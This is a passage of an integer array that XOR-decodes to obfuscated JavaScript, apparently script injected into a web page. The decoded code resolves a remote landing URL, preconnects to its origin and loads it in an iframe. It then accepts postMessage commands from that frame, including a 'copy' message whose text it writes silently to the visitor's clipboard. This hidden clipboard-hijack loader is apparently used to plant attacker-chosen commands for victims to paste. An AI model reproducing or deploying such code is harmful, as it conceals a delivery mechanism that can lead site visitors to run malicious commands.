1,52,42,47,46,1,49,63,35,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,122,122,51,60,122,114,62,51,40,63,57,46,115,122,40,63,46,47,40,52,122,62,51,40,63,57,46,97,87,80,122,122,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,49,122,51,52,122,51,52,42,47,46,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,50,59,41,21,45,52,10,40,53,42,63,40,46,35,116,57,59,54,54,114,51,52,42,47,46,118,122,49,115,115,122,57,53,52,46,51,52,47,63,97,87,80,122,122,122,122,122,122,122,122,44,59,40,122,52,63,41,46,63,62,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,1,49,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,52,63,41,46,63,62,115,122,40,63,46,47,40,52,122,52,63,41,46,63,62,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,63,34,46,40,59,57,46,22,59,52,62,51,52,61,15,40,54,114,40,59,45,115,122,33,87,80,122,122,122,122,51,60,122,114,123,40,59,45,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,46,63,34,46,122,103,122,9,46,40,51,52,61,114,40,59,45,115,116,40,63,42,54,59,57,63,114,117,4,6,47,28,31,28,28,117,118,122,120,120,115,116,46,40,51,55,114,115,97,87,80,122,122,122,122,51,60,122,114,123,46,63,34,46,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,62,51,40,63,57,46,122,103,122,46,53,18,46,46,42,15,40,54,114,46,63,34,46,115,97,87,80,122,122,122,122,51,60,122,114,62,51,40,63,57,46,115,122,40,63,46,47,40,52,122,62,51,40,63,57,46,97,87,80,87,80,122,122,122,122,51,60,122,114,114,46,63,34,46,116,57,50,59,40,27,46,114,106,115,122,103,103,103,122,120,33,120,122,124,124,122,46,63,34,46,116,57,50,59,40,27,46,114,46,63,34,46,116,54,63,52,61,46,50,122,119,122,107,115,122,103,103,103,122,120,39,120,115,122,38,38,87,80,122,122,122,122,122,122,122,122,114,46,63,34,46,116,57,50,59,40,27,46,114,106,115,122,103,103,103,122,120,1,120,122,124,124,122,46,63,34,46,116,57,50,59,40,27,46,114,46,63,34,46,116,54,63,52,61,46,50,122,119,122,107,115,122,103,103,103,122,120,7,120,115,115,122,33,87,80,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,42,59,40,41,63,62,122,103,122,16,9,21,20,116,42,59,40,41,63,114,46,63,34,46,115,97,87,80,122,122,122,122,122,122,122,122,44,59,40,122,48,41,53,52,15,40,54,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,42,59,40,41,63,62,118,122,106,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,48,41,53,52,15,40,54,115,122,40,63,46,47,40,52,122,48,41,53,52,15,40,54,97,87,80,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,55,59,46,57,50,18,46,46,42,122,103,122,46,63,34,46,116,55,59,46,57,50,114,117,50,46,46,42,41,101,96,6,117,6,117,1,4,6,41,120,125,102,100,7,113,117,51,115,97,87,80,122,122,122,122,51,60,122,114,55,59,46,57,50,18,46,46,42,122,124,124,122,55,59,46,57,50,18,46,46,42,1,106,7,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,50,46,46,42,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,55,59,46,57,50,18,46,46,42,1,106,7,115,97,87,80,122,122,122,122,122,122,51,60,122,114,50,46,46,42,15,40,54,115,122,40,63,46,47,40,52,122,50,46,46,42,15,40,54,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,55,59,46,57,50,30,53,55,59,51,52,122,103,122,46,63,34,46,116,55,59,46,57,50,114,117,6,56,1,59,119,32,106,119,99,116,119,7,113,6,116,1,59,119,32,7,33,104,118,39,114,101,96,96,6,62,113,115,101,114,101,96,6,117,1,4,6,41,120,125,102,100,7,112,115,101,117,51,115,97,87,80,122,122,122,122,51,60,122,114,55,59,46,57,50,30,53,55,59,51,52,122,124,124,122,55,59,46,57,50,30,53,55,59,51,52,1,106,7,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,62,53,55,59,51,52,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,55,59,46,57,50,30,53,55,59,51,52,1,106,7,115,97,87,80,122,122,122,122,122,122,51,60,122,114,62,53,55,59,51,52,15,40,54,115,122,40,63,46,47,40,52,122,62,53,55,59,51,52,15,40,54,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,47,40,54,115,122,33,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,52,63,45,122,15,8,22,114,47,40,54,115,116,53,40,51,61,51,52,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,59,62,62,18,51,52,46,114,40,63,54,118,122,50,40,63,60,115,122,33,87,80,122,122,122,122,51,60,122,114,123,50,40,63,60,122,38,38,122,123,62,53,57,47,55,63,52,46,122,38,38,122,123,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,44,59,40,122,49,63,35,122,103,122,40,63,54,122,113,122,120,96,96,120,122,113,122,50,40,63,60,97,87,80,122,122,122,122,51,60,122,114,40,63,61,51,41,46,40,35,116,50,51,52,46,41,1,49,63,35,7,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,50,51,52,46,41,1,49,63,35,7,122,103,122,46,40,47,63,97,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,44,59,40,122,42,59,40,63,52,46,122,103,122,62,53,57,47,55,63,52,46,116,50,63,59,62,122,38,38,122,62,53,57,47,55,63,52,46,116,62,53,57,47,55,63,52,46,31,54,63,55,63,52,46,97,87,80,122,122,122,122,122,122,51,60,122,114,123,42,59,40,63,52,46,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,54,51,52,49,122,103,122,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,114,120,54,51,52,49,120,115,97,87,80,122,122,122,122,122,122,54,51,52,49,116,40,63,54,122,103,122,40,63,54,97,87,80,122,122,122,122,122,122,54,51,52,49,116,50,40,63,60,122,103,122,50,40,63,60,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,40,63,54,122,103,103,103,122,120,42,40,63,57,53,52,52,63,57,46,120,115,122,33,87,80,122,122,122,122,122,122,122,122,54,51,52,49,116,57,40,53,41,41,21,40,51,61,51,52,122,103,122,120,59,52,53,52,35,55,53,47,41,120,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,42,59,40,63,52,46,116,59,42,42,63,52,62,25,50,51,54,62,114,54,51,52,49,115,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,45,59,40,55,47,42,21,40,51,61,51,52,41,114,115,122,33,87,80,122,122,122,122,44,59,40,122,53,40,51,61,51,52,41,122,103,122,33,39,97,87,80,122,122,122,122,44,59,40,122,59,42,51,21,40,51,61,51,52,122,103,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,27,10,19,5,19,30,5,15,8,22,115,97,87,80,122,122,122,122,51,60,122,114,59,42,51,21,40,51,61,51,52,115,122,53,40,51,61,51,52,41,1,59,42,51,21,40,51,61,51,52,7,122,103,122,46,40,47,63,97,87,80,87,80,122,122,122,122,60,53,40,122,114,44,59,40,122,51,122,103,122,106,97,122,51,122,102,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,116,54,63,52,61,46,50,97,122,51,113,113,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,46,42,54,122,103,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,1,51,7,122,124,124,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,1,51,7,116,46,63,55,42,54,59,46,63,97,87,80,122,122,122,122,122,122,51,60,122,114,123,46,42,54,115,122,57,53,52,46,51,52,47,63,97,87,80,122,122,122,122,122,122,44,59,40,122,42,40,53,56,63,122,103,122,46,42,54,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,120,34,120,115,97,87,80,122,122,122,122,122,122,44,59,40,122,53,40,51,61,51,52,122,103,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,42,40,53,56,63,115,97,87,80,122,122,122,122,122,122,51,60,122,114,53,40,51,61,51,52,115,122,53,40,51,61,51,52,41,1,53,40,51,61,51,52,7,122,103,122,46,40,47,63,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,60,53,40,122,114,44,59,40,122,53,40,51,61,51,52,17,63,35,122,51,52,122,53,40,51,61,51,52,41,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,123,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,50,59,41,21,45,52,10,40,53,42,63,40,46,35,116,57,59,54,54,114,53,40,51,61,51,52,41,118,122,53,40,51,61,51,52,17,63,35,115,115,122,57,53,52,46,51,52,47,63,97,87,80,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,62,52,41,119,42,40,63,60,63,46,57,50,120,118,122,53,40,51,61,51,52,17,63,35,115,97,87,80,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,42,40,63,57,53,52,52,63,57,46,120,118,122,53,40,51,61,51,52,17,63,35,115,97,87,80,122,122,122,122,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,61,63,46,23,53,47,52,46,20,53,62,63,114,115,122,33,87,80,122,122,122,122,40,63,46,47,40,52,122,62,53,57,47,55,63,52,46,116,56,53,62,35,122,38,38,122,62,53,57,47,55,63,52,46,116,62,53,57,47,55,63,52,46,31,54,63,55,63,52,46,122,38,38,122,52,47,54,54,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,60,63,46,57,50,14,63,34,46,20,53,14,50,40,53,45,114,47,40,54,118,122,46,51,55,63,53,47,46,23,41,115,122,33,87,80,122,122,122,122,40,63,46,47,40,52,122,52,63,45,122,10,40,53,55,51,41,63,114,60,47,52,57,46,51,53,52,122,114,40,63,41,53,54,44,63,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,123,47,40,54,122,38,38,122,46,35,42,63,53,60,122,60,63,46,57,50,122,123,103,103,122,120,60,47,52,57,46,51,53,52,120,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,41,53,54,44,63,114,120,120,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,44,59,40,122,60,51,52,51,41,50,63,62,122,103,122,60,59,54,41,63,97,87,80,122,122,122,122,122,122,44,59,40,122,46,51,55,63,40,122,103,122,52,47,54,54,97,87,80,122,122,122,122,122,122,44,59,40,122,57,53,52,46,40,53,54,54,63,40,122,103,122,52,47,54,54,97,87,80,87,80,122,122,122,122,122,122,60,47,52,57,46,51,53,52,122,62,53,52,63,114,44,59,54,47,63,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,60,51,52,51,41,50,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,122,122,60,51,52,51,41,50,63,62,122,103,122,46,40,47,63,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,46,51,55,63,40,115,122,57,54,63,59,40,14,51,55,63,53,47,46,114,46,51,55,63,40,115,97,87,80,122,122,122,122,122,122,122,122,40,63,41,53,54,44,63,114,114,44,59,54,47,63,122,38,38,122,120,120,115,116,46,40,51,55,114,115,115,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,27,56,53,40,46,25,53,52,46,40,53,54,54,63,40,122,123,103,103,122,120,47,52,62,63,60,51,52,63,62,120,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,53,52,46,40,53,54,54,63,40,122,103,122,52,63,45,122,27,56,53,40,46,25,53,52,46,40,53,54,54,63,40,114,115,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,46,51,55,63,40,122,103,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,51,60,122,114,57,53,52,46,40,53,54,54,63,40,115,122,57,53,52,46,40,53,54,54,63,40,116,59,56,53,40,46,114,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,122,122,122,122,62,53,52,63,114,120,120,115,97,87,80,122,122,122,122,122,122,122,122,39,118,122,46,51,55,63,53,47,46,23,41,115,97,87,80,87,80,122,122,122,122,122,122,122,122,60,63,46,57,50,114,47,40,54,118,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,59,57,50,63,96,122,120,52,53,119,41,46,53,40,63,120,118,87,80,122,122,122,122,122,122,122,122,122,122,57,40,63,62,63,52,46,51,59,54,41,96,122,120,53,55,51,46,120,118,87,80,122,122,122,122,122,122,122,122,122,122,41,51,61,52,59,54,96,122,57,53,52,46,40,53,54,54,63,40,122,101,122,57,53,52,46,40,53,54,54,63,40,116,41,51,61,52,59,54,122,96,122,44,53,51,62,122,106,87,80,122,122,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,40,63,41,42,53,52,41,63,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,40,63,41,42,53,52,41,63,122,101,122,40,63,41,42,53,52,41,63,116,46,63,34,46,114,115,122,96,122,120,120,97,87,80,122,122,122,122,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,46,63,34,46,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,62,53,52,63,114,46,63,34,46,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,122,122,62,53,52,63,114,120,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,39,115,97,87,80,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,87,80,122,122,122,122,122,122,122,122,62,53,52,63,114,120,120,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,46,40,35,25,53,42,35,114,46,63,34,46,115,122,33,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,46,63,34,46,122,123,103,103,122,120,41,46,40,51,52,61,120,122,38,38,122,123,46,63,34,46,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,46,40,35,122,33,122,45,51,52,62,53,45,116,60,53,57,47,41,114,115,97,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,51,60,122,114,52,59,44,51,61,59,46,53,40,116,57,54,51,42,56,53,59,40,62,122,124,124,122,52,59,44,51,61,59,46,53,40,116,57,54,51,42,56,53,59,40,62,116,45,40,51,46,63,14,63,34,46,115,122,33,87,80,122,122,122,122,122,122,52,59,44,51,61,59,46,53,40,116,57,54,51,42,56,53,59,40,62,116,45,40,51,46,63,14,63,34,46,114,46,63,34,46,115,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,60,59,54,54,56,59,57,49,25,53,42,35,114,46,63,34,46,115,97,87,80,122,122,122,122,122,122,39,115,97,87,80,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,60,59,54,54,56,59,57,49,25,53,42,35,114,46,63,34,46,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,60,59,54,54,56,59,57,49,25,53,42,35,114,46,63,34,46,115,122,33,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,44,59,40,122,55,53,47,52,46,122,103,122,61,63,46,23,53,47,52,46,20,53,62,63,114,115,97,87,80,122,122,122,122,122,122,51,60,122,114,123,55,53,47,52,46,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,46,59,122,103,122,62,53,57,47,55,63,52,46,116,57,40,63,59,46,63,31,54,63,55,63,52,46,114,120,46,63,34,46,59,40,63,59,120,115,97,87,80,122,122,122,122,122,122,46,59,116,44,59,54,47,63,122,103,122,46,63,34,46,97,87,80,122,122,122,122,122,122,46,59,116,41,63,46,27,46,46,40,51,56,47,46,63,114,120,40,63,59,62,53,52,54,35,120,118,122,120,40,63,59,62,53,52,54,35,120,115,97,87,80,122,122,122,122,122,122,46,59,116,41,46,35,54,63,116,42,53,41,51,46,51,53,52,122,103,122,120,60,51,34,63,62,120,97,87,80,122,122,122,122,122,122,46,59,116,41,46,35,54,63,116,54,63,60,46,122,103,122,120,119,99,99,99,99,42,34,120,97,87,80,122,122,122,122,122,122,46,59,116,41,46,35,54,63,116,46,53,42,122,103,122,120,106,120,97,87,80,122,122,122,122,122,122,46,59,116,41,46,35,54,63,116,53,42,59,57,51,46,35,122,103,122,120,106,120,97,87,80,122,122,122,122,122,122,55,53,47,52,46,116,59,42,42,63,52,62,25,50,51,54,62,114,46,59,115,97,87,80,122,122,122,122,122,122,46,40,35,122,33,122,46,59,116,60,53,57,47,41,114,115,97,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,122,122,46,59,116,41,63,54,63,57,46,114,115,97,87,80,122,122,122,122,122,122,46,59,116,41,63,46,9,63,54,63,57,46,51,53,52,8,59,52,61,63,114,106,118,122,46,59,116,44,59,54,47,63,116,54,63,52,61,46,50,115,97,87,80,122,122,122,122,122,122,62,53,57,47,55,63,52,46,116,63,34,63,57,25,53,55,55,59,52,62,114,120,57,53,42,35,120,115,97,87,80,122,122,122,122,122,122,51,60,122,114,46,59,116,42,59,40,63,52,46,20,53,62,63,115,122,46,59,116,42,59,40,63,52,46,20,53,62,63,116,40,63,55,53,44,63,25,50,51,54,62,114,46,59,115,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,56,51,52,62,23,63,41,41,59,61,63,18,59,52,62,54,63,40,114,115,122,33,87,80,122,122,122,122,51,60,122,114,40,63,61,51,41,46,40,35,116,55,63,41,41,59,61,63,24,53,47,52,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,55,63,41,41,59,61,63,24,53,47,52,62,122,103,122,46,40,47,63,97,87,80,87,80,122,122,122,122,45,51,52,62,53,45,116,59,62,62,31,44,63,52,46,22,51,41,46,63,52,63,40,114,120,55,63,41,41,59,61,63,120,118,122,60,47,52,57,46,51,53,52,122,114,63,44,63,52,46,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,62,59,46,59,122,103,122,63,44,63,52,46,122,124,124,122,63,44,63,52,46,116,62,59,46,59,97,87,80,122,122,122,122,122,122,44,59,40,122,51,60,40,59,55,63,122,103,122,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,123,51,60,40,59,55,63,122,38,38,122,123,62,59,46,59,122,38,38,122,46,35,42,63,53,60,122,62,59,46,59,122,123,103,103,122,120,53,56,48,63,57,46,120,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,51,60,122,114,63,44,63,52,46,116,41,53,47,40,57,63,122,124,124,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,122,124,124,122,63,44,63,52,46,116,41,53,47,40,57,63,122,123,103,103,122,51,60,40,59,55,63,116,57,53,52,46,63,52,46,13,51,52,62,53,45,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,59,46,59,116,46,35,42,63,122,103,103,103,122,120,49,46,54,119,41,50,53,45,119,53,40,51,61,51,52,59,54,120,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,40,63,61,51,41,46,40,35,116,62,63,41,46,40,53,35,122,103,103,103,122,120,60,47,52,57,46,51,53,52,120,115,122,40,63,61,51,41,46,40,35,116,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,59,46,59,116,46,35,42,63,122,103,103,103,122,120,49,46,54,119,60,40,59,55,63,119,40,63,59,62,35,120,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,40,63,61,51,41,46,40,35,116,40,63,44,63,59,54,122,103,103,103,122,120,60,47,52,57,46,51,53,52,120,115,122,40,63,61,51,41,46,40,35,116,40,63,44,63,59,54,114,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,59,46,59,116,46,35,42,63,122,103,103,103,122,120,57,53,42,35,120,122,124,124,122,46,35,42,63,53,60,122,62,59,46,59,116,46,63,34,46,122,103,103,103,122,120,41,46,40,51,52,61,120,115,122,33,87,80,122,122,122,122,122,122,122,122,46,40,35,25,53,42,35,114,62,59,46,59,116,46,63,34,46,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,57,54,63,59,52,47,42,114,52,63,34,46,9,46,59,46,47,41,115,122,33,87,80,122,122,122,122,44,59,40,122,51,60,40,59,55,63,122,103,122,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,97,87,80,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,62,63,41,46,40,53,35,122,103,122,52,47,54,54,97,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,40,63,44,63,59,54,122,103,122,52,47,54,54,97,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,51,60,122,114,51,60,40,59,55,63,122,124,124,122,51,60,40,59,55,63,116,42,59,40,63,52,46,20,53,62,63,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,40,59,55,63,116,42,59,40,63,52,46,20,53,62,63,116,40,63,55,53,44,63,25,50,51,54,62,114,51,60,40,59,55,63,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,52,63,34,46,9,46,59,46,47,41,122,38,38,122,120,62,53,52,63,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,40,63,41,53,54,44,63,22,59,52,62,51,52,61,15,40,54,114,51,62,115,122,33,87,80,122,122,122,122,51,60,122,114,123,51,62,122,38,38,122,123,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,116,54,63,52,61,46,50,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,10,40,53,55,51,41,63,116,40,63,41,53,54,44,63,114,120,120,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,60,47,52,57,46,51,53,52,122,41,46,63,42,114,51,52,62,63,34,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,51,52,62,63,34,122,100,103,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,116,54,63,52,61,46,50,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,10,40,53,55,51,41,63,116,40,63,41,53,54,44,63,114,120,120,115,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,44,59,40,122,57,60,61,122,103,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,1,51,52,62,63,34,7,122,38,38,122,33,39,97,87,80,122,122,122,122,122,122,44,59,40,122,56,47,51,54,46,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,56,47,51,54,62,14,40,47,41,46,63,62,15,40,54,114,57,60,61,116,46,63,55,42,54,59,46,63,122,38,38,122,120,120,118,122,51,62,115,115,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,123,56,47,51,54,46,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,41,46,63,42,114,51,52,62,63,34,122,113,122,107,115,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,51,60,122,114,123,57,60,61,116,47,41,63,28,63,46,57,50,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,10,40,53,55,51,41,63,116,40,63,41,53,54,44,63,114,56,47,51,54,46,15,40,54,115,97,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,60,63,46,57,50,14,63,34,46,20,53,14,50,40,53,45,114,56,47,51,54,46,15,40,54,118,122,40,63,61,51,41,46,40,35,116,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,115,87,80,122,122,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,40,59,45,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,44,59,40,122,54,59,52,62,51,52,61,15,40,54,122,103,122,63,34,46,40,59,57,46,22,59,52,62,51,52,61,15,40,54,114,40,59,45,115,97,87,80,122,122,122,122,122,122,122,122,122,122,51,60,122,114,54,59,52,62,51,52,61,15,40,54,115,122,40,63,46,47,40,52,122,54,59,52,62,51,52,61,15,40,54,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,41,46,63,42,114,51,52,62,63,34,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,41,46,63,42,114,51,52,62,63,34,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,39,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,41,46,63,42,114,106,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,59,57,46,51,44,59,46,63,19,60,40,59,55,63,114,47,40,54,115,122,33,87,80,122,122,122,122,51,60,122,114,123,47,40,54,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,59,57,46,51,44,63,120,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,63,34,51,41,46,51,52,61,122,103,122,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,97,87,80,122,122,122,122,51,60,122,114,63,34,51,41,46,51,52,61,115,122,33,87,80,122,122,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,59,57,46,51,44,63,120,97,87,80,122,122,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,55,53,47,52,46,122,103,122,61,63,46,23,53,47,52,46,20,53,62,63,114,115,97,87,80,122,122,122,122,51,60,122,114,123,55,53,47,52,46,115,122,33,87,80,122,122,122,122,122,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,59,57,46,51,44,59,46,63,19,60,40,59,55,63,114,47,40,54,115,97,87,80,122,122,122,122,122,122,39,118,122,106,115,97,87,80,122,122,122,122,122,122,40,63,46,47,40,